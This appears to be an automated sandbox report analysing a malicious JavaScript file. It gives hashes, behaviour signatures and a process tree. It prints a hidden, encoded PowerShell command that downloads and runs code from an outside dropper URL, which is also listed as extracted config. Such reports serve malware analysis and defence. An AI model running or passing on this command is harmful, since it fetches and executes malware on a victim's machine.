Analysis
-
max time kernel
838s -
max time network
840s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
26-07-2021 21:18
Static task
static1
Behavioral task
behavioral1
Sample
details_5613.js
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
General
-
Target
details_5613.js
-
Size
629KB
-
MD5
13ecfbc54efb87498df12bbb02d054ef
-
SHA1
c857c59ef9fae1eaf4c3d1f8389586b2bc8ea8c6
-
SHA256
c91bd39590ae41161fc8d4ae9a453f689512ab90a0cc405d00dc9a50db05ea33
-
SHA512
5993d9c9343c041162f779196fc7a5fea688c1d922d940ca7adf62e4deb683a6104b4299d89f4c5ab05fc1384e7aeeb4e229ce8aed503baa73982c1b8176992d
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://netvalleykenya.com/crm.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 1792 powershell.exe 9 1792 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1792 powershell.exe 1792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1792 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
wscript.execmd.exepowershell.exedescription pid process target process PID 1052 wrote to memory of 1424 1052 wscript.exe cmd.exe PID 1052 wrote to memory of 1424 1052 wscript.exe cmd.exe PID 1052 wrote to memory of 1424 1052 wscript.exe cmd.exe PID 1424 wrote to memory of 1792 1424 cmd.exe powershell.exe PID 1424 wrote to memory of 1792 1424 cmd.exe powershell.exe PID 1424 wrote to memory of 1792 1424 cmd.exe powershell.exe PID 1792 wrote to memory of 828 1792 powershell.exe rundll32.exe PID 1792 wrote to memory of 828 1792 powershell.exe rundll32.exe PID 1792 wrote to memory of 828 1792 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\details_5613.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\glSbzLwAdKQN.bin StartW4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/828-70-0x0000000000000000-mapping.dmp
-
memory/1424-60-0x0000000000000000-mapping.dmp
-
memory/1792-61-0x0000000000000000-mapping.dmp
-
memory/1792-62-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmpFilesize
8KB
-
memory/1792-63-0x0000000002370000-0x0000000002371000-memory.dmpFilesize
4KB
-
memory/1792-64-0x000000001ABF0000-0x000000001ABF1000-memory.dmpFilesize
4KB
-
memory/1792-65-0x000000001A8C0000-0x000000001A8C1000-memory.dmpFilesize
4KB
-
memory/1792-66-0x000000001AB70000-0x000000001AB72000-memory.dmpFilesize
8KB
-
memory/1792-67-0x000000001AB74000-0x000000001AB76000-memory.dmpFilesize
8KB
-
memory/1792-68-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1792-69-0x000000001C230000-0x000000001C231000-memory.dmpFilesize
4KB